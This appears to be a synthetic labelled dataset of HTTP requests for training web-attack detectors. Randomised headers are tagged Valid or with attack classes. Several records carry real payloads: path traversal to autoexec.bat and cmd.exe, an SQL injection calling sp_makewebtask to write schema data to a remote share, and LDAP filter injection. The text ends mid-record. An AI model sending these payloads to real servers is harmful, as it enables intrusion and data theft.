Cookie: esHi=eeutqaoib5ma;uje=8066;F2Di5n=o3%/e>sla;uiihssh8nehrent=iya
Cookie2: $Version="1"
Date: Sat, 29 Jan 05 03:53:33 CET
ETag: W/"H-nR_fhu2JQLg5Kk35B"
Expect: 100-continue
From: 5tiby@ird1trmU.net
If-Modified-Since: Mon, 05 Apr 04 14:18:28 CET
If-Unmodified-Since: Wed, 06 Jun 07 19:45:10 UTC
If-Match: *
If-None-Match: "PSCKtxVSvtA33.xZM5-L"
If-Range: "2SEy-dBl2x3xICyzZ_2"
Max-Forwards: 81
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: Digest qop=auth
Range: 4947-
Referer: /dumnit.wav
TE: deflate;q=0.7,trailers,deflate
Trailer: From
User-Agent: Mozilla/7.7 (X11; U; Solaris 2.6; on-dt; rv:9.2.5) Gecko/48629480
UA-CPU: 68000
UA-Disp: 761,7667,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 894x439
Via: ettp/0.9 www.ontOR.html:340, 8.3 www.seett.jpeg, 5.6 www.Nloic.htm
Transfer-Encoding: identity
Upgrade: 5itIE/7.2, iAlg/7.5
Warning: 127 197.55.244.77 "fosrtaeywgeT" 
X-Forwarded-For: 149.199.155.11
X-Serial-Number: 29493838100482691776
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25356
Start - Id: 7109
class: Valid
PUT /ntOe1rislO3etSb/iNrBu5x5l2FIx/N9hiaee297dctm/egNimDA-@/ssemuaodhhstfiri/z@hX8vokRdOFAl4/ilugCA5iP3xaHCYr/09PmoeuaO6JB.png? HTTP/1.1
Content-Length: 187
Content-Language: qowefk,lByym,akq
Content-Encoding: deflate
Content-Location: /1tld.pdf
Content-MD5: eGtobWpvb2lFdHR3cHRjbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Nov 09 22:54:18 GMT
Last-Modified: Thu, 24 Dec 09 12:58:04 CET
Host: www.esiefqnL.ch
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.7
Cache-Control: tHt8shwo=st5glOf
Client-ip: 7.221.173.20
Cookie: kdpy=socsot;nnepebtKm4ol=esZwjSRRo;ruc=ar;Q4UIgh@NIZU=osjfucC_Po8;dwb6thFtoiafa=eaeeyrmntihawsYnj
Cookie2: $Version="9"
Date: Sun, 13 Dec 09 10:49:09 CET
ETag: "IVVfrEBdYIrDK0ob"
Expect: ysrto=higrege;rafzTA=8ytlrnr
From: tdnn2mqg@aeMhkchG.uk
If-Modified-Since: Fri, 13 Jul 07 01:53:25 CET
If-Unmodified-Since: Wed, 15 Sep 04 09:49:28 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jun 06 22:18:56 GMT
Max-Forwards: 3
MIME-Version: 6.3
Pragma: gi=E
Proxy-Authorization: NTLM STNzaWV0aGVsc2hkcHFUQXI5cWVlcnlpZ2xsdHpiNDNuNzlvQw==
Authorization: elset e5taptt=aKdas
Range: 8-,662-4,012941-8
Referer: http://aaqmhq.biz/qSnaoq/je1u.cfm
TE: trailers
Trailer: Host
User-Agent: vh1ejr (nzNgVn)
UA-CPU: x86
UA-Disp: 9784,4196,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1536x3422
Via: eUen/7.5 www.84osrWf8.jpg, FTP/3.4 180.172.25.150
Transfer-Encoding: compress
Upgrade: nqriee/4.2, etbr/9.3
Warning: 248 www.susut1.tiff "4c8logelende3" 
X-Forwarded-For: 60.44.207.26
X-Serial-Number: 9930337775098315
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I65SandD=045550&KXoUg9yIaccess_log=%eois&su=38&hva=t&ropVywfs=jChd&b7nt=52471&pyNLp=718488&5aeezteal=h&msaEsW=nom]<&ew0eedhskeBSpcg=42&muerss=tlehHeyn&EmaNgrmte4os=0&aeqq=4048800717

End - Id: 7109
Start - Id: 36196
class: PathTransversal
POST /eLs/eoSulr/tienge/AhaS0J66Q1/aa5mbu7_Xc/inonpiihmra0ie6a2om.php3? HTTP/1.1
Content-Length: 194
Content-Language: em,iyzisly
Content-Encoding: compress
Content-Location: http://ziiee.gov/dnonnsht.gif
Content-MD5: dGlzYXJsbWYyajNoaGVBZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 09:03:52 UTC
Last-Modified: Sun, 13 Jun 04 24:26:48 GMT
Host: 79.64.149.159:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Cookie: nsbw2=../../../../../../../../../WINDOWS/autoexec.bat
ETag: W/"aFkEenV8oX_QAkQj"
Expect: ex1a
If-Match: "u-0lwcj8wNLyyWkJ-h"
If-None-Match: "cacaWA@OqODM5uqi"
If-Range: Sat, 30 Aug 08 13:04:16 GMT
Max-Forwards: 6987
Pragma: no-cache
Authorization: Digest response="bced572cCcD70782AE909469fDaE9CBe"
Range: 2-,903689-,0-
Referer: http://www.tetiB.gov/ilasm/c2tsP/ytUsiie6/ouoo/untw.jsp
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 9.3; ic-j0; rv:6.7.2) Gecko/02741906
UA-Color: color32
Via: 2.6 254.114.76.132, cbmne/9.4 www.tctrl.html, 0.9 www.hhzteboe.jpeg
Transfer-Encoding: compress
X-Forwarded-For: 197.230.118.145

unt8=aeaaedidm&ie= tSTwp-4osuvq5&eELSnsbeNwipti5=hedt7nr8ebetweenlw;allb&Soee=91436&as=/t oyt&oh=QasE+reactA2&pere=ha9nadfsoe8ki&tfzdroLphhso=all0at &LW3L=nol&Yoem=0&oiL0ieotfaItaN=rJChjYg

End - Id: 36196
Start - Id: 44720
class: PathTransversal
POST /iNbKaia49XAzGg7pE/ieKlejh1d/xsk/ornMoIyqd/reCb.css? HTTP/1.1
Content-Length: 259
Content-Language: aiei,as,retg
Content-Encoding: compress
Content-Location: http://www.rrOms.st/rhiica/toe6oo/emthEAne.php3
Content-MD5: cmJubGx0c3NhbW9mZWVabg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Feb 04 09:35:48 CET
Last-Modified: Tue, 27 Oct 09 15:46:47 GMT
Host: 197.221.225.239:5
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: respEie-ess, ixt-1aadirvo, Houlrmt-rc, oc-fscvpj;q=0.5, d-jnnih
Cache-Control: min-fresh=5011
Client-ip: 238.150.163.64
Cookie: ss7e=H(iitsoc2l;ajByyiuwlww2sqI=34990;4scriptGL4=69-Mw9BWgy;eSb=6unaETsists;euosepotEntCkes=eid9n;nglta9t9ws=%]o
Cookie2: $Version="777"
Date: Wed, 18 Mar 09 14:13:39 CET
ETag: W/"yCLt4vwNhscQwwl0"
Expect: iLhe
From: eeisiew@psau3afeg.net
If-Modified-Since: Sat, 28 Jun 08 18:53:00 GMT
If-Unmodified-Since: Fri, 19 Jan 07 21:46:30 CET
If-Match: "RSNi_x5sM8f3uBOPU"
If-None-Match: *
If-Range: Sat, 23 Feb 08 14:11:33 UTC
Max-Forwards: 07
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic eWxhczppYVZzb3Jmaw==
Authorization: jgcsu Cefpahao=taAcang
Range: 8542-,-709
Referer: http://rsdqrtwt.fr/setmi7L.exe
TE: chunked,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.4 (compatible; haaeoeyac; SunOS sun4u; ennlume; 8he4rV8b)
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 253x4084
Via: HTTP/6.3 237.31.194.84:9092
Transfer-Encoding: ieem
Upgrade: hcWX/1.9, Lttry/9.2, exAer/3.6, rnt/7.8
Warning: 548 48.64.9.229 "1rslwi8n3tavcnajanu" "Fri, 11 Sep 09 17:43:47 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

efw5yarrtrMtr=5057&ui3ydaz=62828&rHV1Ba=dexoe&ioleg=ie&h3a0i=tb&4nheonSfc0no=processing-instruction4&8eic=s&sPisla9i=ytr&CIDdTgye=iilunw&agT6gG+o&reaeeNmimopl=eU1PGLwJI@L&t4ll=41390396&SeEmajtsls=%2e%2e.\%252f/\%252f/...\%252e..%2e

End - Id: 44720
Start - Id: 13526
class: Valid
GET /Taes4Lpktat.aspx?acttTmajki7=iO6toniTI&lodnop4h3Leg=noDAxncnrietamhN&0C=683689&eholosjTlaep=s%28s&pa09r=h2bPkjG86vT&ab=s.7T61bAefP&Idfslszt=6KdEna6&t5lnrinki=cifmaeandryKSmgahe&oDlike7z=592150&hcAimtteobi=enltr&kabdnDo=8n%25&tlpezoc3=6214870&S2Zc4r7D=hevalsat HTTP/1.0
Host: www.galoebAti.be:80
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.5, x-mac-icelandic;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: cel-1d3dIhv, aant-hXor0n;q=0.2, hs-l6i2;q=0.4
Cache-Control: no-transform
Client-ip: 194.61.206.62
Cookie: orXMFM=mCyslpcSohk9ctuk;uxebdt=hr+ty;Oecetitw5saoo=H2n8he=W
Cookie2: $Version="52"
Date: Sat, 23 Jan 10 03:55:05 GMT
ETag: "cTR0rBiM0FbCjYP6"
Expect: abjbng=ogo1;o7rS=nEheyf
From: LwAn@l8wp.de
If-Modified-Since: Sun, 23 Dec 07 08:53:17 CET
If-Unmodified-Since: Thu, 19 Nov 09 21:56:09 GMT
If-Match: "rPbazryWbOXpXc8.O"
If-None-Match: *
If-Range: Thu, 28 Dec 06 22:53:33 CET
Max-Forwards: 1
MIME-Version: 7.2
Pragma: eamAinat=euilohb
Proxy-Authorization: Digest uri=/owa7YtW/e1ota/dtnFostn/b9tyu/EIRi.pl
Authorization: Digest uri=/httpe2tA/rai8oRe.zip
Range: 99683-
Referer: /tmjt/w6Ft3un/r04arlau/nnhim.swf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.5 (X11; U; Solaris 9.9; ni-Ht; rv:8.1.7) Gecko/53114971
UA-CPU: x86
UA-Disp: 1040,6000,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1988x830
Via: 7.9 61.210.145.92:986
Transfer-Encoding: stl5l
Upgrade: qvtU/2.2, sdc/0.1
Warning: 594 www.syads.jpeg:1 "zroxrtetuds" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 15129
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13526
Start - Id: 20769
class: Valid
GET /xbL4.MAsMt/0allfsUTfKmHSwhere.jpeg?pgatiesmroro=nmeraoel&eaBhtxtns=af2cQzsK5UEv&hqTiiunt=eeei80e&epaisio=2&openYevalZNtp9R2x=ietCn&tmlEat9tchT=ddinon&qemudtqoteeyn=oov&VBaZZFqXdiv=oNdexecietr+%5Dpositionepassthrua3l7I&deieoeeepa=e6FI.c0&aneyat4bBe=objectavse&0lgdeddjp6G3ptA=gerero&r2hehtse64k=68401&9gyTAh7lifr2h=98302 HTTP/1.0
Host: 168.102.87.84:6
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: k-a, cegad-hutsotmi;q=0.7
Cache-Control: max-stale
Client-ip: 136.97.56.27
Cookie: 973swdhDjk=it82anaeem;sdoaei=7956
Cookie2: $Version="416"
Date: Thu, 27 Apr 06 06:03:37 GMT
ETag: W/"qfJA0jbXXdDwigNHh"
Expect: 5dide
From: txeT@aevntoegn.com
If-Modified-Since: Mon, 10 Oct 05 07:52:14 CET
If-Unmodified-Since: Tue, 17 Aug 04 16:02:11 UTC
If-Match: *
If-None-Match: "sA2Q2slyJ-m3fYw"
If-Range: *
Max-Forwards: 283
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic dDJhMDpJdGxlZWFo
Authorization: hEyt naaVe1=pedtk
Range: 68-16
Referer: /eEmtem/oueai/noEl/nths7al.cfm
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.1 (X11; U; Unix 6.6; Re-sY; rv:8.2.4) Gecko/10751720
UA-CPU: StrongARM
UA-Disp: 369,7940,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2236x546
Via: 9.6 www.dftuI.js, FTP/9.6 181.214.233.142, tsn/5.0 98.253.177.32
Transfer-Encoding: identity
Upgrade: ichhc/3.2
Warning: 220 www.htxyn.js:56846 "tipspynata3kBht" "Tue, 15 Sep 09 04:06:34 CET"
X-Forwarded-For: 174.119.33.87
X-Serial-Number: 0880116781853820645
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20769
Start - Id: 44087
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 217.210.151.25:80
Connection: keep-alive
Accept: text/*
Accept-Charset: euc-jp;q=0.9, cp-936, windows-1251, windows-1254;q=0.5, iso-8859-8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: entui=c6e5fhtl
Client-ip: 56.136.139.128
Cookie: ennfnsseoA4j8uo=0409848;odilt5urpTco1oi=cq$ohe:trb;sym4eniesn=2039006;aLd=6105085;nhruplwNT0nil=2415011;ler4nlolflneeo=hmmAnffuD
Cookie2: $Version="0"
Date: Mon, 11 Oct 04 06:53:07 CET
ETag: "CFu08e9ETvSFfKNT.C"
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Mon, 11 Sep 06 05:41:47 GMT
If-Unmodified-Since: Wed, 01 Feb 06 10:47:41 UTC
If-Match: "KUoJ4vK7fOF8Y3B"
If-None-Match: *
If-Range: "nqyUNpCJJmNI08R"
Max-Forwards: 131
MIME-Version: 0.4
Pragma: o8na='dama'
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic dmVtdGw6NHRoZWhl
Range: 70-
Referer: http://okiiatr.st/mahidiaE/ibai5yd.tar.gz
TE: trailers,deflate,deflate
Trailer: Authorization
User-Agent: Mozilla/6.6 (Windows; U; Win98 8.3; ht-en; rv:1.3.8) Gecko/48119500
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: w2he/7.4 www.ohoaiall.png, tatd/2.3 www.lrtNeuo.htm
Transfer-Encoding: 2cou23
Upgrade: unHis2/9.7, sDw/8.7
Warning: 578 121.175.223.34:52334 "pneeY2IslooLh" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44087
Start - Id: 41045
class: SqlInjection
GET /aaZYjN@XW/tthhoylsrjiepeP1wlT/oD@51vC0C31X/ztonseeji6yedc8/Gr55IUTNWZOeWWL.js?Gse9d=%27%3B++++EXEC++master..sp_makewebtask++%22%5C%5C33.64.58.181%5CfqmLhwht%5Cp6.html%22%2C+%22SELECT+*+++FROM+++INFORMATION_SCHEMA.TABLES%22&naS8jOB_.ak=yrusrh&ihs=35853&loesaioaium7Nsh=ewa%26hLwdivrc&dteh3cim=aifqrns HTTP/1.0
Host: www.yc3reselo3.cz:80
Connection: keep-alive
Accept: image/gif, application/*;q=0.1, text/plain
Accept-Charset: euc-jp;q=0.2, isiri-3342;q=0.2, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 228.241.241.37
Cookie: eseeTliatsr=@se
Cookie2: $Version="90"
Date: Sun, 03 May 09 16:36:04 CET
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: issottp
From: ZU4adNb@HtspshaDre.fr
If-Modified-Since: Sun, 21 Dec 08 20:35:04 UTC
If-Unmodified-Since: Wed, 25 Nov 09 24:23:35 UTC
If-Match: "8wX7mC.vklwA5ck59"
If-None-Match: "MIM1Rkne.Zn7WM3SoY"
If-Range: "zRu2NRpV9XxMIV6l6ykf"
Max-Forwards: 2380
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: NTLM cm9ic0NhcmdsaWRobjhzT3NtaWl2YXVsa3Vpbms1YW50bkZyem5sc29mdHQ=
Range: 7-04,570-
Referer: /etahttmd/e8s8hhf/teyzta/ogdtanb/tsue.pdf
TE: gzip;q=0.2,trailers,deflate;q=0.0
User-Agent: Mozilla/4.2 (X11; U; Linux i386 0.1; fA-je; rv:8.3.6) Gecko/16088271
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 381x817
Via: HTTP/2.5 www.ibheu0.htm, HTTP/1.9 140.49.10.245, HTTP/5.0 www.86h8voir.jpeg:0343
Transfer-Encoding: gzip
Upgrade: zjfx/0.3
Warning: 050 www.r6ioleOa.htm "witutEd" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41045
Start - Id: 39070
class: LdapInjection
POST /tmpF.binX4c@RY8S/svGzkCd9x_zzYQuv/.-P/5i0le1a/efrRhrtm/notwk00ittmwatim/oomhesirfeonee/UwthfoditnopR8csiemh.jpeg? HTTP/1.0
Content-Length: 95
Content-Language: 9eis,ng,o0hfti
Content-Encoding: deflate
Content-Location: /ogofai/Nfwi/tepeq.pdf
Content-MD5: bTltaW9lcmVsYUN0aHRxcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Feb 09 15:28:08 GMT
Last-Modified: Mon, 29 Jun 09 20:42:34 CET
Host: www.weooho.biz
Connection: dzxf
Accept: image/gif, video/*, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: os-mdg;q=0.8, iAn5j5eu-cei;q=0.4
Cache-Control: CeuzaB='da'
Client-ip: 94.224.234.137
Cookie: ernauaqlaTen0=739;niOsarttran=)    (  |(trt=ep*);Oassarrtsehgc=siframe;9ioceieforfl=eav';mrrpch0cfqsnlas=tusmocha;8UbRlnlLy=hgzueesst
Cookie2: $Version="57"
Date: Thu, 07 Sep 06 06:40:47 CET
ETag: W/"yvzX9iqgrv6V52Mvwhh"
Expect: 100-continue
From: leml@092ceIht4.ch
If-Modified-Since: Thu, 17 Jan 08 23:06:06 GMT
If-Unmodified-Since: Mon, 29 Dec 08 11:39:09 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 04 Aug 09 06:13:09 GMT
Max-Forwards: 794
MIME-Version: 8.7
Pragma: newCe='AeretT'
Proxy-Authorization: Eopcuo 5d0mN=6raE
Authorization: Digest algorithm=eEOrol
Range: -798,89211-,080300-12
Referer: http://www.mibr.net/too6ql4t/tg3hzb/ides/jedca8.swf
TE: deflate
Trailer: User-Agent
User-Agent: a2YcVldVnn http://www.OlNtiirw.org
UA-CPU: 68000
UA-Disp: 5522,0953,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 427x4997
Via: eEoel/6.4 194.119.68.245, f4o/2.8 51.135.146.223
Transfer-Encoding: identity
Upgrade: oe8sa5/3.6, asot/7.7, vIoul/0.4, Oitiff/6.5
Warning: 409 www.nfofe.html "eeMcrdphcDeina" "Sat, 18 Nov 06 09:11:30 UTC"
X-Forwarded-For: 35.165.196.147
X-Serial-Number: 53018392304378
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

titsd0riselw=n &zbrReelst=532501398&bteoasn3df=zx&e2picmsst=RacmdlgVco&lel6=iit4&Vkcatq1xGsP=57

End - Id: 39070
Start - Id: 38516
class: LdapInjection
GET /NLnaftp-m.js?of3foz=b2x%29%28%26%28objectClass++++%3D++ote*%29&eW9Clike.=ayW1-HXgcY&aeotsrvETiqkvi=edsidceahn7%2B&T4=%3Fe&ooer=46979&sNo2ei=3&g8one8ieaqer=hrCnacy&ettEfuGerda=stdinStbd4Ndr%3Bi&nnT=%29o+sgroup+bys%7EooWsH1Sxv3%263&ICX44E3T=+leninmtixzoydps%24u HTTP/1.1
Host: 19.224.114.173:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-6, ks_c_5601-1987
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=60
Client-ip: 54.57.173.108
Cookie: uoo0i71hpn8=8gnd4oL;edjsgnrep=0;zt0nqa81dcmerm= em0;in=t@;roahsoaouN1Bbb=1ngoa4n;sskluooeysei=is;iten6moaxe T
Cookie2: $Version="807"
Date: Mon, 11 Apr 05 17:41:11 CET
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: lscomkd@ophedlorn.cz
If-Modified-Since: Sat, 17 Oct 09 17:34:26 UTC
If-Unmodified-Since: Sat, 22 Aug 09 01:16:36 GMT
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "OjODF.LDmgJ1crs"
If-Range: Mon, 15 Sep 08 18:12:11 CET
Max-Forwards: 067
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM OWhYczduY291cmthT2hTa3JvM3NoZW5vZVlycmtkdU9lZ3JlYWVxbm52
Range: -087,245-62681,-648438
Referer: /oheg.php3
TE: gzip,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 2.7; vm-nt; rv:6.9.4) Gecko/74234514
UA-CPU: 68000
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8726x4401
Via: FTP/7.9 www.nteeeeti.css, 0.8 142.66.45.74, HTTP/4.2 232.117.232.48:44151
Transfer-Encoding: ehiyol; lsna=jfcsaoq1
Upgrade: eoete/5.1, htnmD/8.6
Warning: 474 3.199.185.32 "psgyu2iuh9p6t" "Wed, 30 Jul 08 06:32:37 UTC"
X-Forwarded-For: 77.77.248.41
X-Serial-Number: 30599
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38516
Start - Id: 5380
class: Valid
POST /nomeinmn/z_b-J6linkHNjJMhttpoptC.tiff? HTTP/1.1
Content-Length: 181
Content-Language: umlw6rle,Tonaioa,AWeh
Content-Encoding: compress
Content-Location: http://www.eusoo.ch/lcasnl.asmx
Content-MD5: b3AzdGU3aXRzaHJjcnQ5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Dec 04 10:35:07 CET
Last-Modified: Thu, 27 Apr 06 14:41:40 UTC
Host: 140.127.244.225
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-jp;q=0.5, windows-1251;q=0.4
Accept-Encoding: 
Accept-Language: ror-Ste;q=0.0, 5eh-1ieeN, SasSIna-rwsrMtsH
Cache-Control: max-age=5
Client-ip: 251.59.191.179
Cookie: suop=149772;og=62386;tap89nxrd3=574253233;BconnecthEU0-1=wDl
Cookie2: $Version="21"
Date: Thu, 22 Jun 06 13:33:11 GMT
ETag: "KpoJdC8IOHh0PCG"
Expect: rftTqE=eUtiR;Fnmuttp
From: nojeamee@zitf6g.it
If-Modified-Since: Mon, 11 Apr 05 06:27:16 CET
If-Unmodified-Since: Tue, 13 Jul 04 13:27:06 CET
If-Match: "u_mPjut.5FG@coOJUo"
If-None-Match: *
If-Range: Thu, 29 Oct 09 21:43:37 UTC
Max-Forwards: 8
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: hjrb rneuidoi=tA3pN
Authorization: fes3 ohat=hztlna
Range: 429-04732,0-0702,6-47430
Referer: /StayLn.dll
TE: gzip;q=0.9
Trailer: Pragma
User-Agent: e781izto http://www.ioarua.st
UA-CPU: x86
UA-Disp: 725,766,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 237x186
Via: 5.1 209.69.61.142:72, 3.6 www.0etHD.tiff:6, 3.0 www.Pannt.png
Transfer-Encoding: gzip
Upgrade: m4rr/9.8, leutb/5.3, pbd/7.7
Warning: 111 www.ryaeFet.css "w2rhtt" 
X-Forwarded-For: 72.151.254.224
X-Serial-Number: 028740747069773
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

jil5onr3E=2511&7x1mDOOD=eeL2|eeiNIlauAol=&dsnrsL4ralfpnow=27908&eD=8404740&d3dcCXW1=ash&htItreanwfdaEh=82060286&Ithow=fdCN64mmtfamaa6&9enht06=o&guMmhOWgp=b0Xeznrttimg&40We2G=080

End - Id: 5380
Start - Id: 24337
class: Valid
GET /NeNqserviceseax3/q7KA.y/afFapnfeNtt/ikg.mdb? HTTP/1.0
Host: www.d6Aehvlsd.net
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 84.215.140.201
Cookie: vz=khNnireyaon;47sios=03718067
Cookie2: $Version="7"
Date: Thu, 01 Jun 06 16:47:43 CET
ETag: W/"-GF@WxqCsWldnYw_1T8"
Expect: cefsv=ghaeeUc;vsoa4eh=lhIdpaie
From: 5hRu@STpwssetis.be
If-Modified-Since: Thu, 26 Jan 06 17:57:06 UTC
If-Unmodified-Since: Sat, 21 Jul 07 20:50:04 CET
If-Match: "c2Tyv3dN5TA2zQ63h2Tk"
If-None-Match: *
If-Range: "kJuYqzpit3vWV71o"
Max-Forwards: 5
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: sdipe ouneodh=Rermt
Authorization: Digest nc=A6Ecf3a9
Range: 3174-4551,6064-
Referer: http://www.crae0eac.fr/loTt/ruejre/ntftidam/666nlak8.nsf
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: n6dj (od1JvxAm; djmEBS1D; a8KlcZAO0)
UA-CPU: StrongARM
UA-Disp: 515,9191,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 352x5203
Via: 9.5 145.154.134.153:51883, trth/4.0 www.at3sucrh.html, FTP/3.7 27.25.48.247
Transfer-Encoding: e4feeo
Upgrade: Hiu/7.2, tsosIp/1.1, 2cq/2.4, jea8Dd/0.5
Warning: 189 www.Wti6r.tiff "Tpeaaepto6Oncyta" "Mon, 01 Jun 09 20:09:31 CET"
X-Forwarded-For: 153.46.193.204
X-Serial-Number: 6737813475044771
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24337
Start - Id: 26458
class: Valid
GET /E7hcPP0VP/slWetJniet/cmw7SOrz1nRA/cep4oRsweieHYe/rtccneramtg/WCOK/suJSZs8a2nxWjbKY.htm?rdsinmtaiccania=sotoendenoon&G7HJ=telnetineg&ornd9itNoneasom=35&gc5ot=i+dtrp3Odeleteo&kaenisar8o6hIc=7936382&Aucpnewt9=iq9I&8jr=%5B%3Diwe%5Blt&Il9e=Oegec5oeoax&xFy.ETDNe=iFmmlVeyfE&dcme=nward6processing-instruction%25%5Ch%3Fi27xp_hejo%25&jnIR=05&OrE0lOk_A.q=xiTye7&tRtseypfEe=090093135 HTTP/1.1
Host: www.IaasH.it
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-japanese, windows-1257;q=0.9, x-mac-japanese;q=0.3, macintosh;q=0.5, x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: Tohhp='n'
Client-ip: 38.220.231.237
Cookie: styobLro=1
Cookie2: $Version="0"
Date: Sat, 06 Jun 09 15:34:14 GMT
ETag: W/"aH2jp.pfySLbmKqBQ"
Expect: tqsfeEqs=itaeDa
From: nthers@Iodoaa9t.it
If-Modified-Since: Sun, 05 Jun 05 10:36:40 GMT
If-Unmodified-Since: Sat, 05 Nov 05 12:10:11 UTC
If-Match: *
If-None-Match: *
If-Range: "zvbtGWGZjTGL_WP5"
Max-Forwards: 400
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest username="tmff8btS"
Authorization: NTLM c25idGlzb2xudHRobGZlaHJuZ29lcm84c3V2ZXQ4YW1pdGF3Um9kdHRvbGFjd3Rq
Range: 31-37154,2-
Referer: http://www.s3ajz.cz/ogul/tonobpna/rEvE.zip
TE: trailers,gzip;q=0.6
Trailer: From
User-Agent: oeitt/0.5.0.8.6
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 326x7197
Via: sOi/8.4 195.231.110.54, 2.8 49.89.56.192, 5.1 189.84.34.175
Transfer-Encoding: if6hi
Upgrade: oesMe/2.1, Ecf4t/7.9, sogEr/5.0
Warning: 220 www.o3thefd.html "7cronrpc" "Thu, 19 Apr 07 17:54:26 UTC"
X-Forwarded-For: 189.141.174.39
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26458
Start - Id: 30183
class: Valid
GET /objectAinu93Uupdate_DinwhFp/b39v/tTa7/FTY4PH/cseoudede37/erdnbN9Tyiwle/egidhluhehu.htm? HTTP/1.0
Host: 146.170.0.111
Connection: close
Accept: application/*, video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ls1terd-1nStloe;q=0.0, sco4Niu-f9, euois-snhThn;q=0.0
Cache-Control: max-stale
